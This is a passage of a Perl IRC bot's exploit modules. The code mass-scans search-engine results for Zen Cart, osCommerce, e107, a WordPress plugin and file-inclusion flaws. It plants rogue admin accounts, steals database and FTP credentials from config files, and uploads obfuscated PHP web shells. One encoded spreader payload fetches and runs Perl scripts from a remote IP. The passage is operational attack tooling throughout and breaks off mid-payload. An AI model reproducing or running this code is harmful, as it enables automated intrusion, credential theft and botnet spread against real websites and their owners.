foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$zenlogo15$engine 9Finished 15for 9$dork "); }
my $test = "http://".$site.$bug;
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /zc_install/){
&zen_query($chan,$site,$test,$engine);
}
} exit; }
}
}
}
sub zen_query() {
my $chan = $_[0];
my $url = $_[1];
my $test = $_[2];
my $engine = $_[3];
my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
my $req = HTTP::Request->new(POST => $test);
$req->content_type("application/x-www-form-urlencoded");
$req->content("query_string=".$code);
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(3);
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /1 statements processed/i ) {
&msg("$chan","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$url."admin/login.php ");
&msg("$admin","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$url."admin/login.php ");
}
elsif ( $data =~ /Duplicate entry/i ) {
&msg("$chan","$zenlogo15$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php )");
&msg("$admin","$zenlogo15$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php ");
}
}
sub osco_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo15$engine 9Finished 15for 9$dork "); }
my $cat = "http://".$site."admin/categories.php/login.php";
my $fm = "http://".$site."admin/file_manager.php/login.php";
my $bm = "http://".$site."admin/banner_manager.php/login.php";
my $shell = "http://".$site."images/lobex.php";
my $dumper = "http://".$site."images/lobexdb.php";
my $coba = &get_content($cat);
my $cob2 = &get_content($fm);
my $cob3 = &get_content($bm);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
my $test = $cat."?action=download&filename=/includes/configure.php";
my $cek = &get_content($test);
if ($cek =~ /http:\/\//) {
&osql_xpl($test,$chan,$site,$engine);
}
my $aplod = LWP::UserAgent->new;
my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
my $cekap = &get_content($shell);
if ($cekap =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$oscologo15$engine 4<9=4>9 Dumper 4<9=4>9 $dumper ");sleep(1);
}
}
if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
my $test2 = $fm."?action=download&filename=/includes/configure.php";
my $cek2 = &get_content($test2);
if ($cek2 =~ /http:\/\//) {
&osql_xpl($test2,$chan,$site,$engine);
}
my $aplod2 = LWP::UserAgent->new;
my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
my $cekap = &get_content($shell);
if ($cekap =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$oscologo15$engine 4<9=4>9 Dumper 4<9=4>9 $dumper ");sleep(1);
}
}
if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
my $test3 = $bm."?action=download&filename=/includes/configure.php";
my $cek3 = &get_content($test3);
if ($cek3 =~ /http:\/\//) {
&osql_xpl($test3,$chan,$site,$engine);
}
my $aplod3 = LWP::UserAgent->new;
my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
my $cekap = &get_content($shell);
if ($cekap =~ /UnKnown - Simple Shell/) {
my $safe = ""; my $os = ""; my $uid = "";
if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
&msg("$chan","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$admin","$oscologo15$engine 4<9=4>9 sHeLL 4<9=4>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
&msg("$chan","$oscologo15$engine 4<9=4>9 Dumper 4<9=4>9 $dumper ");sleep(1);
}
}
} exit;
}
}
}
sub osql_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
my @dbsinfo;
if ($response->is_success) {
my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
my $res = $response->as_string;
if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
$dpath = $1;
&msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DIR path: 4 $dpath");
}
if ($res =~ m/'DB_SERVER', '(.*)'/g) {
$dbserver = $1;
&msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB Server: 4 $dbserver");
}
if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
$dbuser = $1;
&msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB username: 4 $dbuser");
}
if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
$dbpass = $1;
&msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB password: 4 $dbpass");
}
if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
$dbname = $1;
&msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB database: 4 $dbname");
}
my $hosts = "http://".$site;
if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
$host = $2;
&dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
&ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
}
}
}
sub e107_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$e107logo15$engine 9Finished 15for 9$dork "); }
my $test = "http://".$site.$bug;
my $shellz = "http://".$site."/images/lobex.php";
my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
my $html = &e107_rce_query($test,$code);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
&msg("$chan","$e107logo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $sys = $1;
my $upload = "";
my $res = &e107_rce_query($test);
if ($res =~ /lobexxx/) {
my $check = &get_content($shellz);
if ($check =~ /UnKnown - Simple Shell/) {
&msg("$chan","$e107logo15$engine 4<9=4>9 SheLL 4<9=4>9 $shellz ");sleep(2);
}
} else { &msg("$chan","$e107logo15$engine 4<9=4>15 System 4<9=4>9 $test 15($sys) ");sleep(2); }
}
} exit; }
}
}
}
sub e107_rce_query() {
my $url = $_[0];
my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVNNEVQNThWZndINCtz
cXFSWkZPT21rU0hiWTVTQWMxUjJVZU5yN1JVUGtKaTcxa3RpUjdkRHRJZjc3amUya0w4c3V4MVpi
Q1RXZGJKNXNiRHllMFB0THpzdmRIVktWYjRJblZ4T3AvZmJ4N2c2VlJjaFIwa1ZWemZpOWYzV01l
WWI4UGFZVTFYNHJpYU00N2crdUo5NlVmQ1lQM2wyNy9kUFQ3a0hya1NtbVJrUmtqVTluQ0tUV2dr
SGgwUkNHZjFURENiNGNqV0dTeTA0OHdtckd6ZmpuTGZjdytuZ2N4YU54UE93N3dFZHhXRUJna2hH
MEpQd2VBWU9tR3QxbEU5cndzWUVwTXFQRmJsTUIrb2xrbHR4UWxaNHhKb1hJcUxlcWZ3VjVvNmVX
b25ZbG1WNVArUGowSWxldUJ1Y1JCQmhjWE9EamRFTWhTdlFWMURXQWVYY3FXQ3BReURnWFYwS1hu
QlRVWDJqa3VlL2s5UHg4Q0RMVlBkTUhMU1FFK1I1MkdGME5VOUVHcVNBczk3SHJQU0dwbGZpVHFH
Y3V4RkNRaWdMdkkzbTF3dnY0a2lpV285L013UkNPNWsyWDNVR25SQXRuZUJxNjVmMGJGRWI1VlZv
cGFCKzNISUcxWWhNSkNlYW1UWGw0ZjJUdzlUbXY1VzJCYS8vZTZzUnpmak04djFTamlaZm1na1l6
T0hOaGxLaHhWemNud1l2UGh2MmJSR1hSL3pPNlByMktQRHNOR1VpYW9XT05PaCtjamEraTYwUXlI
QXhUM2wyQU80dnlnUEUwcndCM25oVXJ5cHdHTU9oelFTUm9UN3Q4KzhnRmVic0dmdUFRYU44MFVW
MDNVUUJYNXdMaG5uTTZweWR3L2djWEM0NE9RM2w0VlBHYzVteXY0N3k5cWJSL3BwdWFOaE5qM1JU
N2g0YS9vRWZrWTNjL2Y3QWZBSjdnWUpVN3dMM09aMUpoZ1RHcDROQlE3T01BVFZyQUFQcDFlUFRi
QVdHL05jY1lDTkJaeGJMUVV5cVc4QWdSU1NrQ2pPN1h6dnV2blp0eXZTbWZPVkZWaU0yeEpwVTkw
dlpwbUV6RlJnMVlEWlVMVlliTWpLV0x6TjI0MUpqY1ViYXFRM1lwV0tGODQ5LzNPcDRkVmV2YU03
NmNaZXQzSHh3Wmg2UzZraHdaV0FEZzVvU2ZOdXhwMm5qN3QwWGMzdjZmSElEK2ZwSTZrWkhNQThs
eGdRcXpRMERwRzdOdUViRWFoQmlmdkM3b21TZ0t3ck5Ud0I3amNxV1JYcFkweEpwKzBSZ1pqVkNj
RmhuZTlzYlZ0R0I0djR1RDBTUEpLL3Y3QWZBZFJ0bUphcnhkS1lVRHNpR0tLdGVzaEVxUHhSMXhV
Wk9tOHFZZDA4MS90REF1Wms0eVo4RmxkOXZvR1BTTFllWXN5eWl2cTBpdTlpM0FEUGkxMjh5bStZ
bnJuQjljdEVxcnVLWUx5KzZpelNJMjRoczFIZnZvMXpvUHB3dnpnRVNhRTZWUFdyWUlyc2phaDZk
dHBhMTRhMWplalJWNEZKdHJqdHdzMmNveU1uTzJmYm0rQTNzdFcxVERxY3NCMHBObzJLVjV0bU04
OFJwV3ZEdkFUSkNkdzA4ODBzUlNwMHh2QVA0M0tib29FMVNEemJ1cUpyQjI2bTkrVlNqVHJkc2p6
VWZBMjVOemN5ODhJN2VRMFpZL3J0SVUvZ2xQR2xuQjErRmdiR2pQRVQ1VHovYTJ2UkM1SHZwVGNy
Z2pTYkxhVEhIMnpRV3NjeVVsOUF0R1RjR2JjcWswTGJ5TlpYdWxwSnRiMEZrTGtaUzRWakdSYnVK
SGEyZHIrQTVXc1RCQzd5emVoZkphOHZhYTNuYjRtekU3V2c3WHpzZVRmd0U9IikpKTsKJGZpY2hp
ZXIgPSBmb3BlbignLi9pbWFnZXMvbG9iZXgucGhwJywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRj
KTsKZmNsb3NlKCRmaWNoaWVyKTsK=";
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
}
sub e107_spread_query() {
my $url = $_[0];
my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveG1sLnR4dDtwZXJsIHhtbC50eHQ7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveHBsLnR4dDtwZXJsIHhwbC50eHQ7IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVzID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0Kd2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
}
sub ih_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$ihlogo15$engine 9Finished 15for 9$dork "); }
my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVNNEVQNThWZndINCtz
cXFSWkZPT21rU0hiWTVTQWMxUjJVZU5yN1JVUGtKaTcxa3RpUjdkRHRJZjc3amUya0w4c3V4MVpi
Q1RXZGJKNXNiRHllMFB0THpzdmRIVktWYjRJblZ4T3AvZmJ4N2c2VlJjaFIwa1ZWemZpOWYzV01l
WWI4UGFZVTFYNHJpYU00N2crdUo5NlVmQ1lQM2wyNy9kUFQ3a0hya1NtbVJrUmtqVTluQ0tUV2dr
SGgwUkNHZjFURENiNGNqV0dTeTA0OHdtckd6ZmpuTGZjdytuZ2N4YU54UE93N3dFZHhXRUJna2hH
MEpQd2VBWU9tR3QxbEU5cndzWUVwTXFQRmJsTUIrb2xrbHR4UWxaNHhKb1hJcUxlcWZ3VjVvNmVX
b25ZbG1WNVArUGowSWxldUJ1Y1JCQmhjWE9EamRFTWhTdlFWMURXQWVYY3FXQ3BReURnWFYwS1hu
QlRVWDJqa3VlL2s5UHg4Q0RMVlBkTUhMU1FFK1I1MkdGME5VOUVHcVNBczk3SHJQU0dwbGZpVHFH
Y3V4RkNRaWdMdkkzbTF3dnY0a2lpV285L013UkNPNWsyWDNVR25SQXRuZUJxNjVmMGJGRWI1VlZv
cGFCKzNISUcxWWhNSkNlYW1UWGw0ZjJUdzlUbXY1VzJCYS8vZTZzUnpmak04djFTamlaZm1na1l6
T0hOaGxLaHhWemNud1l2UGh2MmJSR1hSL3pPNlByMktQRHNOR1VpYW9XT05PaCtjamEraTYwUXlI
QXhUM2wyQU80dnlnUEUwcndCM25oVXJ5cHdHTU9oelFTUm9UN3Q4KzhnRmVic0dmdUFRYU44MFVW
MDNVUUJYNXdMaG5uTTZweWR3L2djWEM0NE9RM2w0VlBHYzVteXY0N3k5cWJSL3BwdWFOaE5qM1JU
N2g0YS9vRWZrWTNjL2Y3QWZBSjdnWUpVN3dMM09aMUpoZ1RHcDROQlE3T01BVFZyQUFQcDFlUFRi
QVdHL05jY1lDTkJaeGJMUVV5cVc4QWdSU1NrQ2pPN1h6dnV2blp0eXZTbWZPVkZWaU0yeEpwVTkw
dlpwbUV6RlJnMVlEWlVMVlliTWpLV0x6TjI0MUpqY1ViYXFRM1lwV0tGODQ5LzNPcDRkVmV2YU03
NmNaZXQzSHh3Wmg2UzZraHdaV0FEZzVvU2ZOdXhwMm5qN3QwWGMzdjZmSElEK2ZwSTZrWkhNQThs
eGdRcXpRMERwRzdOdUViRWFoQmlmdkM3b21TZ0t3ck5Ud0I3amNxV1JYcFkweEpwKzBSZ1pqVkNj
RmhuZTlzYlZ0R0I0djR1RDBTUEpLL3Y3QWZBZFJ0bUphcnhkS1lVRHNpR0tLdGVzaEVxUHhSMXhV
Wk9tOHFZZDA4MS90REF1Wms0eVo4RmxkOXZvR1BTTFllWXN5eWl2cTBpdTlpM0FEUGkxMjh5bStZ
bnJuQjljdEVxcnVLWUx5KzZpelNJMjRoczFIZnZvMXpvUHB3dnpnRVNhRTZWUFdyWUlyc2phaDZk
dHBhMTRhMWplalJWNEZKdHJqdHdzMmNveU1uTzJmYm0rQTNzdFcxVERxY3NCMHBObzJLVjV0bU04
OFJwV3ZEdkFUSkNkdzA4ODBzUlNwMHh2QVA0M0tib29FMVNEemJ1cUpyQjI2bTkrVlNqVHJkc2p6
VWZBMjVOemN5ODhJN2VRMFpZL3J0SVUvZ2xQR2xuQjErRmdiR2pQRVQ1VHovYTJ2UkM1SHZwVGNy
Z2pTYkxhVEhIMnpRV3NjeVVsOUF0R1RjR2JjcWswTGJ5TlpYdWxwSnRiMEZrTGtaUzRWakdSYnVK
SGEyZHIrQTVXc1RCQzd5emVoZkphOHZhYTNuYjRtekU3V2c3WHpzZVRmd0U9IikpKTsKJGZpY2hp
ZXIgPSBmb3BlbignLi9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xv
c2UoJGZpY2hpZXIpOwo=";
my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
my $coba = &get_content($cekih);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
&msg("$chan","$ihlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $res = &get_content($shell);sleep(1);
if ($res =~ /UnKnown - Simple Shell/){
&msg("$chan","$ihlogo15$engine 4<9=4>9 SheLL 4<9=4>9 $shell ");
} else { &msg("$chan","$ihlogo15$engine 4<9=4>9 Vuln 4<9=4>9 $site 4<9=4> Os=$uname $uid");
}
}
} exit;
}
}
}
}
sub rfi_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$rfilogo15$engine 9Finished 15for 9$dork "); }
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $cek = &get_content($coba);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
&get_content($dor);sleep(1);
if ($cek =~ /failed to open stream/) {
&msg("$chan","$rfilogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $check = &get_content($test);sleep(1);
if ($check =~ /stunshell/i) {
&os2($test,$chan,$engine,$rfilogo);
}
}
} exit;
}
}
}
}
sub lfi_exploit() {
my $chan = $_[0];
my $bug = $_[1];
my $simpan = $_[2];
my $dork = $_[3];
my $engine = $_[4];
my $count = 0;
my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@totexploit);
if ($num > 0){
foreach my $site(@totexploit){
$count++;
if ($count == $num-1) { &msg("$chan","$lfilogo15$engine 9Finished 15for 9$dork "); }
my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
&msg("$chan","$lfilogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
my $res = lfi_env_query($test);
# &lfi_spread_query($test);
if ($res =~ /c0li#(.*?)#c0li(.*?)SUCCESS/) {
my $os = $1;
my $uid = $2;
my $lficheck = &get_content($shell);
if ($lficheck =~ /UnKnown - Simple Shell/){
&msg("$chan","$lfilogo15$engine 4<9=4>9 SheLL 4<9=4>9 $shell 15(OS=$os) $uid ");
} else {
&msg("$chan","$lfilogo15$engine 4<9=4>9 Vuln 4<9=4>9 $site 15(OS=$os) $uid ");
}
}
}
} exit; }
}
}
}
sub lfi_env_query() {
my $url = $_[0];
my $code = 'JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWxkUnVNMkZIMHVNL3dIb1hQ
R3ppdzRlVHVkMllFNHV4Ulp5YlFrTkVINkFveFVzUldpeFpZOGtsazJjdmp2dlpMc2ZDd0xwWjNO
V0p4N3ovMDZPcnBCOTNBNUwycHFGRWlLQ1o0b1dxVDIyOGU3TzBkWElSTldXQ0UxNDJyK29UR3lH
ZkwzbUVWSCs2MGtqdUs0UHh4Y2UwYnltZHg3dCszMkQ0KzdPNjBIcHBoQlVzVTFDdEVoQkxVV1p3
cVBKbUQwU2pTNnhoZmo4VWhsTVl6SCtOYTRHZis4NVI1U2YwR2lhNXhaVTMwSG1JcDVDUWhaTW9L
V2hOOGhpS0NwVXpmY3BEYngyTUFVbWRIaU1LTUEvY1E0V082Z1dNOFlrMDl4MUZ2MXZ3SzIwWEJZ
MGJTU1dTOGhmWHhsSGlXWHc3TUlFZ3pQei9IeEU3Q1FLL29LZHdBZ1c1cktrc29RS3M2RjB0TWxK
d1gxU2hOczdqczVPVHNiQVZyMXpQUmVDd2xXWGdvYVVwZkRaTFFSUnhDVys5ak5ucERVUmZ4V1J6
b1g0ajVWVW9IM0ViWmM0WDE4VGhUTDBhL21ZQWhVWnEzTG8wR25iZ3RyZUFhNjRmMHJGRWI1UUZv
cjlSdzNISUcxWWdzSkNlYW1XM2w3ZjJudzlUbXY2VzJHYS9mTzhzUnpmaU9lMzZMeHRaZm1na1lq
SEtNYkpTcVowbG9sYS9IcHFIODFRYzc3ZjFHRGs4dklzM2ZJcU5JTWhYalUyZkJuWlJrTnhzbDFP
Qng3dHdIdUxNb0R4dE84QXFoc1Nhd29aaHFBMEkxQkpHaFJ1MjM3eUNWNXV3RytvNGlPM2lTaUl5
Y2lBS1ZtZ1dOS001M1Qzb1QvenNXQ293TVUyOTVFUEtkczN1MDRyNW1paHM4RVhEUEYvcWJoUWln
Vk9aeldqeC9zcDllZDltT3dxaG5nWVhRS05uYURXMkJaS2pqc0VQczRnQkVUTUFBdjJocjlhWURi
WXEweGdRQVlvbTlNZFRNVldHdUVES3NTQVZOcWVPZmQxODdOdHQ1SHp4d2VGTVRtT0pQS0huSjdP
ODJzNHFtR2NvYktCUlJRVTF2cEltWTNMVFVtcDhSSkZTb3RjaW1VWXZ6N1hzZXpUN1N1UGVQTEti
